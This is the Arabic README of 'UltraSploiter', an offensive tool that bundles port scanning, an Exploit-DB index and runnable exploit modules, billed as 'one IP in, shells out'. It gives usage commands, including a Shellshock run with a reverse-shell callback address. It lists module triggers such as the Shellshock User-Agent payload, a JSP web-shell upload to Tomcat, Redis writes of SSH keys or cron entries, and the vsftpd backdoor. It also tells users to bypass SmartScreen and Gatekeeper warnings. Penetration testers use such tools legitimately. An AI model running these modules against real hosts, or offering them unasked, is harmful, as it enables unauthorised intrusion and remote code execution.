ثنائي واحد يدمج ماسح منافذ، وفهرس Exploit-DB الكامل (47 ألف مدخل) ووحدات استغلال قابلة للتشغيل في أداة واحدة. مكتوب بلغة Rust، ويعمل على Linux وWindows وmacOS.
فحص، مطابقة، استغلال — عنوان IP واحد يدخل، وأصداف تخرج.
ملف تنفيذي واحد يدمج ماسح منافذ، وفهرس Exploit-DB الكامل، ومجموعة من وحدات الاستغلال القابلة للتشغيل في أداة واحدة. يعمل على Linux وWindows وmacOS.
| المهمة | عادةً | هنا |
|---|---|---|
| العثور على الخدمات على مضيف | nmap | UltraSploiter scan <ip> |
| البحث عن ثغرات | searchsploit | UltraSploiter search <kw> |
| إطلاقها | msfconsole | UltraSploiter exploit <ip> <module> |

أبسط وأفضل طريقة هي مجرد الحصول على الملف التنفيذي الجاهز وتشغيله. لا شيء لتثبيته، لا تبعيات — ملف واحد مكتفٍ ذاتيًا.
حمّل من صفحة الإصدارات:
UltraSploiter-windows-x86_64.exe → انقر نقرًا مزدوجًاUltraSploiter-linux-x86_64تنبيه: أدوات الأمان يتم الإبلاغ عنها. من المرجح أن يحذّر Windows SmartScreen ومضاد الفيروسات أو يحجر الملف التنفيذي — انقر More info → Run anyway، أو أضف استثناءً إذا كنت ستحتفظ به.
انقر نقرًا مزدوجًا على UltraSploiter.exe. ستُفتح القائمة.
إذا حذّر SmartScreen من ناشر غير معروف (سيحدث ذلك، لأي ملف تنفيذي غير موقّع)، انقر More info → Run anyway.
chmod +x UltraSploiter-linux-x86_64
./UltraSploiter-linux-x86_64
chmod +x UltraSploiter-macos-arm64
./UltraSploiter-macos-arm64
إذا حجبه Gatekeeper (مجددًا، أي ملف تنفيذي غير موقّع)، إما انقر بزر الفأرة الأيمن → Open، أو أزل علامة الحجر مرة واحدة:
xattr -d com.apple.quarantine UltraSploiter-macos-arm64
مطلوب فقط إذا لم يكن هناك ملف تنفيذي لمنصتك، أو أردت تعديله. يتطلب Rust 1.74+.
sudo apt install build-essential # gcc + linker (Debian/Ubuntu)
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh # -> ./UltraSploiter
xcode-select --install # clang + linker
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh # -> ./UltraSploiter
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
.\build.ps1 # -> UltraSploiter.exe
يستخدم build.ps1 سلسلة الأدوات stable-x86_64-pc-windows-gnu، التي تربط مع
MinGW — لذا لا تحتاج إلى Visual Studio أو MSVC. يثبّت سلسلة الأدوات تلك
إذا كانت مفقودة. إذا كان لديك بالفعل MSVC Build Tools، فإن أمر
cargo build --release العادي يعمل أيضًا.
تنبيه Windows + GNU: يستدعي
windows-sys(الذي يجلبه tokio) الأمرdlltool، الذي يستدعي بدوره المُجمّعas— ومكوّن rust-mingw لا يوفّرas. يبحثbuild.ps1عن مجلد MinGW bin الذي يحتويه في%~dp0tools\mingw64\binو%USERPROFILE%\tools\mingw64\bin، ويضيفه إلىPATHعند العثور عليه. ضع نسخة winlibs هناك إذا واجهتerror calling dlltool. سلاسل أدوات MSVC غير متأثرة.
بدون وسائط تحصل على القائمة:
1) Scan a target find open ports and services
2) Search exploits keyword lookup
3) List runnable modules
4) Run an exploit pick a target and a module
5) Console advanced msf-style commands
0) Exit
UltraSploiter scan 10.0.0.5 # top 1000 ports + fingerprint + suggestions
UltraSploiter scan 10.0.0.5 -p 1-1024 -T4 # range, fast timing
UltraSploiter scan 10.0.0.5 -p - # all 65535 ports
UltraSploiter scan 10.0.0.5 -sU # UDP scan
UltraSploiter scan 10.0.0.5 --json
UltraSploiter scan 10.0.0.5 -oX out.xml
UltraSploiter search samba
UltraSploiter info 17491
UltraSploiter show 17491 # print the PoC source for an Exploit-DB id
UltraSploiter modules
UltraSploiter msf search smb # bridge to Metasploit (needs it installed)
UltraSploiter exploit 10.0.0.5 vsftpd_234
UltraSploiter exploit 10.0.0.5 shellshock -o lhost=10.0.0.1 -o lport=4444
UltraSploiter console
على Linux/macOS، أضف البادئة ./ (مثل ./UltraSploiter scan 10.0.0.5).
| الوسيط | المعنى |
|---|---|
-p <spec> | top (1000)، 80,443، 1-1024، - (الكل) |
-T0..-T5 | قالب التوقيت — من أبطأ/أهدأ إلى أسرع/أكثر ضجيجًا |
-sU | فحص استكشاف UDP |
-sV | كشف الخدمة/الإصدار (مفعّل افتراضيًا) |
--no-banner | تخطي التقاط البانر |
--json | JSON إلى stdout |
-oX <file> | XML بنمط nmap |
الماسح غير متزامن (tokio): كل مستوى -T يحدد عدد المقابس النشطة في آن واحد
(حتى 8000 عند -T5)، لذا يغطي قائمة nmap top-1000 في ثانيتين. كل "open" هو
مصافحة TCP مكتملة، لذا النتائج دقيقة.
-o key=value)| المفتاح | يستخدمه | المعنى |
|---|---|---|
lhost, lport | وحدات rev-shell | عنوان الاستدعاء الراجع |
rport | وحدات الويب | تجاوز منفذ HTTP |
path | shellshock، struts، phpunit | مسار نقطة النهاية |
user, pass | tomcat_manager | بيانات اعتماد المدير |
core | solr_rce | اسم نواة Solr |
file | grafana_lfi | الملف المراد قراءته |
ssh_pubkey | redis_unauth | المفتاح المراد إسقاطه في authorized_keys |
src, dst | proftpd_modcopy | نسخ المصدر / الوجهة |
timeout | الكل | مهلة المقبس بالثواني |
search وinfo مدعومان بفهرس Exploit-DB الكامل — أكثر من 47,000 مدخل
(نفس مجموعة البيانات التي يستخدمها searchsploit)، مضمّن في الملف التنفيذي.
عندما يحمل مدخل CVE تنفّذه وحدة قابلة للتشغيل، يربط info بينهما:
$ UltraSploiter info 17491
Exploit-DB 17491
description vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
codes OSVDB-73573;CVE-2011-2523
[runnable] vsftpd_234
UltraSploiter exploit <ip> vsftpd_234
| الوحدة | CVE | المُشغّل |
|---|---|---|
vsftpd_234 | CVE-2011-2523 | اسم المستخدم :) → صدفة bind بصلاحيات root على 6200 |
unrealircd_backdoor | CVE-2010-2075 | AB; <cmd> عبر IRC |
distcc_exec | CVE-2004-2687 | وسيط مُجمّع بروتوكول DIST |
proftpd_modcopy | CVE-2015-3306 | نسخ ملف SITE CPFR/CPTO |
redis_unauth | — | CONFIG SET يكتب مفتاحًا أو مدخل cron |
shellshock | CVE-2014-6271 | User-Agent: () { :; }; <cmd> |
struts2_5638 | CVE-2017-5638 | OGNL في Content-Type |
tomcat_put | CVE-2017-12615 | PUT لصدفة ويب JSP |
tomcat_manager | — | نشر WAR عبر /manager |
elasticsearch_groovy | CVE-2015-1427 | تنفيذ Groovy عن بُعد في _search |
drupalgeddon2 | CVE-2018-7600 | استدعاء عرض Form API |
phpunit_eval | CVE-2017-9841 | eval-stdin.php |
jenkins_script | CVE-2019-1003000 | /script Groovy بدون مصادقة |
solr_rce | CVE-2019-17558 | قالب Velocity في stream.body |
grafana_lfi | CVE-2021-43798 | قراءة ملف عبر اجتياز مسار الإضافة |
webmin_backdoor | CVE-2019-15107 | password_change.cgi يمرّر قيمة إلى صدفة |
php_cgi_arg_injection | CVE-2012-1823 | -d auto_prepend_file عبر سلسلة الاستعلام |
كل وحدة تنفّذ check() غير مدمّر وrun().
هذه وصفات JSON صغيرة يشغّلها محرك الكتالوج في data/catalog.json.
إضافة وحدة هي ~8 أسطر من البيانات، وليس ملف مصدر جديد: